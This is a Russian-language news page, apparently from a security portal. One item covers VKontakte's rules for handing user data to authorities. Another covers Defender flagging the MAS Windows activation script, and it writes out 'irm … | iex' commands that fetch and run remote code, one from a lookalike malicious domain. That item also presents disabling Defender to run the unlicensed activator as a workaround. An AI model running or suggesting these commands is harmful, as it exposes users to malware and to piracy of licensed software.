ВКонтакте опубликовала правила выдачи персональных данных пользователей

ВКонтакте опубликовала правила выдачи персональных данных пользователей

ВКонтакте опубликовала правила выдачи персональных данных пользователей

Социальная сеть «ВКонтакте» опубликовала правила взаимодействия с правоохранительными органами по части предоставления персональной информации пользователей. Согласно этим правилам, структуры могут запросить номер телефона, адрес электронной почты, время размещения спорного контента и другие данные без соответствующего решения суда.

Ознакомиться с новыми правилами социальной платформы можно в специально созданном разделе. Узнать все вышеозначенные данные могут: прокуратура, МВД, ФСБ, Роскомнадзор, Федеральная антимонопольная служба и некоторые другие органы.

Представители соцсети отметили, что личные сообщения пользователей находятся под защитой Конституции РФ, следовательно, не могут быть выданы ни одному из регуляторов без решения суда.

«К сожалению, уведомлять пользователей о поступивших запросах в большинстве стран мира, включая Россию, запрещено. В России мы, как и другие сервисы, ограничены ст. 12 Федерального закона 144-ФЗ «Об оперативно-розыскной деятельности», п. 15 Постановления Правительства РФ № 759 от 31 июля 2014 года и ст. 161 Уголовно-процессуального кодекса. Сам факт получения запроса относится к конфиденциальным данным, мы не вправе их раскрывать», — отметили в «ВК».

Напомним, что в сентябре «ВК» пошла навстречу правоохранительным органам, выдав им переписку обвиняемого в разжигании межнациональной розни (статья 282 УК РФ) Эдуарда Никитина. Никитина в настоящее время судят за политический анекдот, который, как считает следствие, мог спровоцировать ненависть к русским и россиянам.

А в августе представители социальной платформы сообщили, что сделают общедоступной статистику обращений органов власти к социальной сети. Такой шаг станет некой формой ответа на обвинения в сборе и передаче пользовательских данных различным структурам. Подобные обвинения в адрес соцсети звучат довольно часто.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru